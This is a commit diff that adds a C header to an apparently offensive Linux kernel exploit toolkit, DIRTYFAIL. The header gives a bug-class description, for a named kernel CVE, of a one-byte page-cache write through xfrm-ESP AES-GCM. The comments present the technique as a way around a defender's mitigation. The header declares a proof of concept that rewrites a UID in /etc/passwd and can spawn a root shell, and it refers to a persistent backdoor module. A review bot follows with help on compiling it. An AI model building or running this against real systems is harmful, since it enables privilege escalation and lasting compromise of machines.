Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL
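--- /dev/null
+++ b/copyfail_gcm.h
@@ -0,0 +1,61 @@
+/*
+ * DIRTYFAIL — copyfail_gcm.h
+ *
+ * Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD.
+ *
+ * This module is a sibling primitive to copyfail.c (4-byte authencesn
+ * STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It
+ * targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path),
+ * but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the
+ * AEAD. That changes the primitive in two useful ways:
+ *
+ * 1. Coverage. A defender who blacklisted only `algif_aead` to stop
+ * Copy Fail (CVE-2026-31431) is still vulnerable here — neither
+ * algif_aead nor the authencesn template is on the path.
+ *
+ * 2. Granularity. AES-GCM is a counter-mode cipher; in-place
+ * "decryption" is just XORing the keystream onto the spliced
+ * page byte. We can land an arbitrary single byte at any file
+ * offset (no 4-byte alignment, no 4-byte side-effects) by
+ * brute-forcing the IV until keystream[0] equals
+ * `target_byte XOR desired_byte`.
+ *
+ * The 1-byte primitive is what makes the persistent backdoor mode
+ * (`backdoor.c`) feasible without alignment juggling.
+ *
+ * Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
+ * (`copyfail2.c`), reimplemented here in DIRTYFAIL style.
+ */
+
+#ifndef DIRTYFAIL_COPYFAIL_GCM_H
+#define DIRTYFAIL_COPYFAIL_GCM_H
+
+#include "common.h"
+
+/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */
+df_result_t copyfail_gcm_detect(void);
+
+/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE.
+ * Equivalent functional outcome to copyfail_exploit() and
+ * dirtyfrag_esp_exploit() — different kernel path. */
+df_result_t copyfail_gcm_exploit(bool do_shell);
+df_result_t copyfail_gcm_exploit_inner(void);
+
+/* Low-level building block exposed for backdoor.c:
+ * write a single byte at `target_path` offset `target_off`. The caller
+ * MUST already be inside a fresh user namespace with CAP_NET_ADMIN
+ * (ESP SA registration prerequisite). Returns true on apparent
+ * success — caller verifies via re-read. */
+bool cfg_1byte_write(const char *target_path,
+                     off_t target_off,
+                     unsigned char desired_byte);
+
+/* Active probe: installs a GCM SA with arbitrary IV, fires ONE
+ * gcm_trigger against a /tmp sentinel. Skips IV brute force entirely;
+ * the kernel STORE writes an unpredictable byte (keystream XOR 'A')
+ * which still confirms the path is reachable. Returns DF_VULNERABLE
+ * on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
+df_result_t copyfail_gcm_active_probe(void);
+df_result_t copyfail_gcm_active_probe_inner(void);
+
+#endif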
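Review bot: The declarations use `bool` (copyfail_gcm_exploit) and `off_t` (cfg_1byte_write) while the header includes only `common.h`, so the header is self-contained only if common.h happens to pull in `<stdbool.h>` and `<sys/types.h>` — nothing in this hunk confirms that. If it does not, add `#include <stdbool.h>` and `#include <sys/types.h>` next to the `common.h` line so the header still compiles when it is the first include of a translation unit. A smaller point of style: `cfg_1byte_write` breaks the `copyfail_gcm_` prefix that the other five declarations share, which makes the module's exports harder to find by name.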